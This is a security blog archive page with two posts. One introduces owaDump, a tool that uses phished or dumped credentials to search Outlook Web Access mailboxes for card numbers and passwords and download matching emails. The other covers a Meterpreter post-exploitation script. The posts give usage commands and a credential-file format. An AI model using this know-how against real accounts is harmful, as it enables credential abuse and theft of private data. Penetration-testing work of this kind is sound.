Archive

Posts Tagged ‘Metasploit’

owaDump – Another tool to use during Phishing Campaigns

October 20, 2016 Leave a comment

There were a number of tools available in the Internet for attacking Exchange/Outlook Web Access.

Below are some of them that I have used before.
1) OWA-Toolkit (https://github.com/Shellntel/OWA-Toolkit#owa-toolkit)
2) Metasploit Outlook Web Access (OWA) Bruteforce Utility (https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_login)
3) OWABF (http://web.archive.org/web/20150429003843/http://sla.ckers.org/forum/read.php?12,26944)
4) PEAS (https://github.com/mwrlabs/peas)
5) MailSniper (https://github.com/dafthack/MailSniper)

During a phishing test, other than attempting to gain further access to the target’s network via HTA powershell, exploiting out-of-date browser plugins and etc, another interesting thing to look at are targets’ email accounts.

If we have captured more than 50 to 100 credentials via the phishing test, it might not be feasible to ransack the mailboxes one at a time manually.

I needed a simple tool (that I can write in a couple of hours) to search the mailboxes of users for PAN (VISA and MasterCard) numbers, passwords or even specific keywords.

As there were tons of resources on the Internet regarding Exchange Web Services (EWS) for C#, I decided to write the tool in C# instead of the usual Python/Ruby and use mono to run the executable on OSX and Linux. I have tested this on OSX and Win32.

Mono can be downloaded from http://www.mono-project.com/download/.

It should work on all versions of OWA.
Please let me know if you face any issues.

$ mono owaDump.exe -h
-u, –user       Required. Email Address
-p, –pass       Required. Password
-f, –file       Text File (Email|Password) Per Line
-k, –keyword    Text to Search
–pan            (Default: False) Find PAN numbers
-d               (Default: False) Debug Mode
-h, –help       (Default: False) Print This Help Menu

Below are some ways you can use the tool.
In the below example, keywords such as password, creds, credentials, ssn, credit card are used as search terms.

$ mono owaDump.exe -u keith@company.com -p Password#

Checking: keith@company.com
[Subject]: RE [WARNING :  MESSAGE ENCRYPTED]
[Subject]: RE [WARNING :  Test Mail]

If you check the current folder, you will see the below files.
Emails and attachments that we found to be matching the search terms were downloaded.

$ ls
keith_Inbox1.eml
keith_Inbox2.eml

If you would like to search for PAN numbers, you can use the –pan keyword.

$ mono owaDump.exe -u keith@company.com -p ‘Password’ –pan
Checking: keith@company.com
…………………..
[PAN] PAN Number found in keith_Inbox3.eml

If you have a list of email addresses and passwords which you captured from a phishing test or a dump from the Domain Controller, you can use the below.

Below is the format of the text file if you want to target multiple accounts.

$ cat creds.txt
keith@company.com|password1
keith1@company.com|password2

$ mono owaDump.exe -f creds.txt
Checking: keith@company.com
[Subject]: RE [WARNING :  MESSAGE ENCRYPTED]
[Subject]: RE [WARNING :  Test Mail]

Checking: keith1@company.com
[Subject]: RE [WARNING :  MESSAGE ENCRYPTED]
[Subject]: RE [WARNING :  Test Mail]

The source code is available for download at https://github.com/milo2012/owaDump.

If you needed a compiled version of the executable, it is available at https://github.com/milo2012/owaDump/releases.

This is a pre-release.  Please send me your comments and suggestions.

Thank you for reading.

 

Meterpreter Script for Prefetch-Tool

October 22, 2009 Leave a comment

This is the first meterpreter script I wrote for Metasploit Framework . I have integrated the use of the prefetch-tool via a meterpreter script.

As mentioned in the previous post, the windows prefetch folder contains information about what the frequently used programs are and based on this information, you can actually find out how the computer was used by the user/roles of the computer in the network.

This meterpreter script is not integrated into Metasploit.  To use it, please follow the below steps

1. Download the below files

a. PrefetchTool Meterpreter Script
b. Prefetch Tool Executable

2. Copy the prefetchtool.rb file to [<metasploit installation folder>\msf3\scripts\meterpreter] folder

3. Copy prefetch.exe to [<metasploit installation folder>\msf3\data] folder

Check out the demo videos below.

http://securitytube.net/Metasploit-Post-Exploitation-Meterpreter-Script-Prefetchtool-video.aspx

http://www.youtube.com/watch?v=0z1Nuk-w2AU&fmt=22

http://vimeo.com/7204412

If you face any issues or have any cool ideas for new scripts, you can contact me at keith.lee2012[at]gmail.com.   (:

Categories: Metasploit Tags: